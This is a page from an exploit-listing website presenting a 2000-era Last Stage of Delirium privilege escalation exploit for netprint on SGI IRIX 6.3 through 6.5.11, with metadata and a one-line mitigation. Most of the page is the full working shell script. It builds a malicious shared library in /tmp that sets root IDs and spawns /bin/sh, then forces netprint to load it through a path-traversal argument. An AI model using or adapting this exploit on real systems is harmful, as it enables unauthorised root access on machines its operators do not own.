Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Privilege Escalation in netprint on IRIX - exploit.company
header-logo
Suggest Exploit
vendor:
IRIX
by:
LAST STAGE OF DELIRIUM
7.5
CVSS
HIGH
Privilege Escalation
CWE
Product Name: IRIX
Affected Version From: IRIX 6.3
Affected Version To: IRIX 6.5.11
Patch Exists: NO
Related CWE:
CPE: o:sgi:irix:6.3
Metasploit:
Other Scripts:
Platforms Tested: IRIX
2000

Privilege Escalation in netprint on IRIX

This code allows local lp users on IRIX 6.3 and above to conduct privilege escalation attacks. It creates a shared library that is loaded by the netprint executable, allowing the attacker to execute arbitrary code with root privileges.

Mitigation:

Apply patches provided by the vendor.
Source

Exploit-DB raw data:

#!/bin/sh
## copyright LAST STAGE OF DELIRIUM jul 2000 poland            *://lsd-pl.net/ #
## /usr/lib/print/netprint                                                     #
##                                                                             #
## This code gets released due to another post to the Bugtraq mailing list.    #
## For IRIX 6.3 and above this privilage escalation attack can be conducted    #
## by local lp users only.                                                     #

EXECUTABLE=/usr/lib/print/netprint
LIBRARY=lsd
DIRECTORY=/tmp

cd $DIRECTORY
cat > $LIBRARY.c << 'EOF'
OpenConn(){
    printf("copyright LAST STAGE OF DELIRIUM jul 2000 poland  //lsd-pl.net/\n");
    printf("/usr/lib/print/netprint for irix 5.3 6.2 6.3 6.4 6.5 6.5.11 IP:all\n");
    printf("\n");
    setreuid(getuid(),0);setuid(0);setgid(0);
    execl("/bin/sh","sh",0);
}
CloseConn(){} ListPrinters(){} SendJob(){} CancelJob(){} WaitForJob(){}
GetQueue(){} StartTagging(){} StopTagging(){} Install(){} AddTimeout(){}
RemoveSemiColons(){} ListAllPrinters(){} CreateInterface(){} InstallPrinter(){}
InstallIcon(){} SockRead(){} IsDest(){} BSDSendJob(){}
EOF
cc -c $LIBRARY.c  -o $LIBRARY.o
ld -shared $LIBRARY.o -o $LIBRARY.so
rm -rf $LIBRARY.[co] so_locations
if [ ! -f "$LIBRARY.so" ]
    then
    echo "error: building library"
    exit 1
fi
chmod 666 $LIBRARY.so

$EXECUTABLE -n ../../../../$DIRECTORY/$LIBRARY -h localhost -p lalala bzz-zz


# milw0rm.com [2001-05-08]

Navigation

Suggest Exploit

Services By CQR